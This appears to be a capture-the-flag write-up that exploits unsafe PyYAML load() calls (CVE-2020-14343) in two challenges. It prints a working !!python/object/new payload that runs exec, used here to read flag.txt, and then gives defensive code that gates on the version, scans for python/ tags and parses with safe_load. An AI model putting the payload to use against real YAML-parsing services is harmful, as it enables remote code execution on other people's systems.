Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).

Challenge Checker 1

We are prompted to paste in YAML data. We can see from the code that yaml.load() is called on it directly, with no Loader argument:

```python
from yaml import load

...

def check(raw_data) -> "Tuple[list[str], list[str]]":
    data = load(raw_data)
```
There exists a deserialization exploit in PyYAML that was only fixed in version 5.4.1.
We can see from requirements.txt that the version is 3.13, which is vulnerable.
```
PyYAML==3.13
termcolor==1.1.0
```
From the GitHub issue, we can find some of the proof-of-concept payloads. For instance:

```yaml
- !!python/object/new:str
  args: []
  state: !!python/tuple
  - "RCE_HERE"
  - !!python/object/new:staticmethod
    args: [0]
    state:
      update: !!python/name:exec
```
So, in chall.yaml, I simply added this PoC under authors:

```yaml
authors:
  - anli
  - Edward Feng
  - !!python/object/new:str
    args: []
    state: !!python/tuple
    - "print(open('flag.txt').read())"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
visible: true
```
This executes print(open('flag.txt').read()) and reads the flag.

Challenge Checker 2

The only change is that PyYAML is now version 5.3.1:

```
PyYAML==5.3.1
termcolor==1.1.0
```

The exploit we used previously affects every version below 5.4.1, so it works here too. From 5.1 onwards a bare load() call falls back to FullLoader (with a warning), but CVE-2020-14343 is precisely the python/object/new bypass of FullLoader's restrictions, so 5.3.1 is just as reachable as 3.13.
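The defender's side of both checkers, as an added example that is not part of the original write-up or the challenge code: a version gate for the requirements.txt pin (vulnerable below the 5.4.1 fix version the write-up cites), a pre-parse scan that refuses any document using the python/ tag namespace (in both the !!python/ shorthand and the verbatim !<tag:yaml.org,2002:python/...> spelling, plus any %TAG directive that could re-alias a handle), and a load_untrusted() replacement for the challenge's load(raw_data) that parses with yaml.safe_load. The sample inputs are constructed from the page's own requirements.txt and chall.yaml (payload body left as the issue's RCE_HERE placeholder); the gate functions are stdlib-only, and only load_untrusted() assumes PyYAML is installed.

```python
import re
from typing import List, Optional, Tuple

# Fix version as stated in the write-up; any pin below it is treated as vulnerable.
FIXED_VERSION: Tuple[int, ...] = (5, 4, 1)

# Both spellings of the python/ tag namespace that PyYAML's unsafe and Full loaders honour.
PYTHON_TAG_RE = re.compile(r"(?:!!python/[\w./:-]+|!<tag:yaml\.org,2002:python/[^>]+>)")
# A %TAG directive can re-alias `!!` or bind a new handle to the python/ prefix, so it is
# refused outright rather than interpreted.
TAG_DIRECTIVE_RE = re.compile(r"^%TAG\b", re.MULTILINE)


class UnsafeYAMLError(ValueError):
    """Raised when a document would need Python-object construction to parse."""


def pinned_version(requirements: str, package: str = "PyYAML") -> Optional[Tuple[int, ...]]:
    """Return the `package==x.y.z` pin from requirements.txt text, or None if not pinned."""
    for line in requirements.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        m = re.fullmatch(rf"{re.escape(package)}\s*==\s*([0-9]+(?:\.[0-9]+)*)", line, re.IGNORECASE)
        if m:
            return tuple(int(part) for part in m.group(1).split("."))
    return None


def is_vulnerable_pin(requirements: str) -> bool:
    """True when PyYAML is pinned to a version below FIXED_VERSION."""
    version = pinned_version(requirements)
    return version is not None and version < FIXED_VERSION


def find_python_tags(text: str) -> List[str]:
    """Every python/ tag spelled out in the document, in order of appearance."""
    return PYTHON_TAG_RE.findall(text)


def gate_reason(text: str) -> Optional[str]:
    """Why the document must not be parsed, or None if it passes the pre-parse gate."""
    tags = find_python_tags(text)
    if tags:
        return f"python/ tags present: {tags}"
    if TAG_DIRECTIVE_RE.search(text):
        return "%TAG directive present"
    return None


def load_untrusted(text: str):
    """Hardened replacement for the challenge's `load(raw_data)`.

    The gate above is defence in depth; the real fix is SafeLoader, which only ever builds
    plain YAML types (str, int, list, dict, ...). Assumes PyYAML is importable.
    """
    reason = gate_reason(text)
    if reason is not None:
        raise UnsafeYAMLError(f"refusing document: {reason}")
    import yaml  # assumption: PyYAML installed; imported here so the gate stays stdlib-only
    return yaml.safe_load(text)


# Constructed samples: the page's requirements.txt pins and its chall.yaml with the PoC under
# `authors` (payload body left as the upstream issue's "RCE_HERE" placeholder).
REQS_CHALL1 = "PyYAML==3.13\ntermcolor==1.1.0\n"
REQS_CHALL2 = "PyYAML==5.3.1\ntermcolor==1.1.0\n"

TAINTED_CHALL = """\
authors:
  - anli
  - Edward Feng
  - !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec
visible: true
"""

CLEAN_CHALL = """\
authors:
  - anli
  - Edward Feng
visible: true
"""

if __name__ == "__main__":
    for name, reqs in (("Checker 1", REQS_CHALL1), ("Checker 2", REQS_CHALL2)):
        verdict = "vulnerable" if is_vulnerable_pin(reqs) else "ok"
        print(f"{name}: PyYAML {pinned_version(reqs)} -> {verdict}")
    print("tainted chall.yaml:", gate_reason(TAINTED_CHALL))
    print("clean chall.yaml:", load_untrusted(CLEAN_CHALL))
```

The tag scan is deliberately a gate, not a parser: it refuses documents that a safe loader would reject anyway, which lets the check run (and log) before any YAML library touches the input. Anything that passes the gate is still parsed only with safe_load, so an unanticipated tag spelling falls back to SafeLoader's ConstructorError rather than to object construction.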